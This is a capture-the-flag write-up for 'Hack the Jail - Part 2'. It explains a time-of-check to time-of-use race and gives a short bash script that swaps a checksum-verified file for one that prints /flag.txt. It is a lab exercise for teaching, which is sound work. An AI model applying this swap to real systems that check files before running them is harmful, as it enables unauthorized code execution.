44 lines
1.0 KiB
Markdown
44 lines
1.0 KiB
Markdown
|
# Hack the Jail - Part 2
|
||
|
|
|
||
|
|
## Difficulty
|
||
|
|
|
||
|
|
Hard.
|
||
|
|
|
||
|
|
## How To solve
|
||
|
|
|
||
|
|
The key insight of this challenge is that the file is opened twice: once for checking whether
|
||
|
|
the MD5sum matches the expected value, and the second time for actually executing the file.
|
||
|
|
|
||
|
|
This type of vulnerabity is called a "Time-of-check to time-of-use" or in short a TOCTTOU attack.
|
||
|
|
The challenge contains an artificially long timeout to be able to exploit this vulnerabity more easily.
|
||
|
|
|
||
|
|
The script below performs the actual attack:
|
||
|
|
|
||
|
|
|
||
|
|
```bash
|
||
|
|
#!/bin/bash
|
||
|
|
|
||
|
|
# run the vulnerable program in the backgrouncd
|
||
|
|
./execute &
|
||
|
|
# make sure that the check has been performed
|
||
|
|
sleep 1
|
||
|
|
# then replace the program with our malicious program
|
||
|
|
mv hello_world.sh hello_world.sh.old
|
||
|
|
cp read.sh hello_world.sh
|
||
|
|
# wait until the "execute" program has finished.
|
||
|
|
sleep 8
|
||
|
|
# clean up
|
||
|
|
rm hello_world.sh
|
||
|
|
mv hello_world.sh.old hello_world.sh
|
||
|
|
```
|
||
|
|
|
||
|
|
The contents of the `read.sh` file are as follows:
|
||
|
|
|
||
|
|
```
|
||
|
|
#!/bin/bash
|
||
|
|
|
||
|
|
cat /flag.txt
|
||
|
|
```
|
||
|
|
|
||
|
|
Both files need to have executable permissions which can be obtained using `chmod +x *.sh`.
|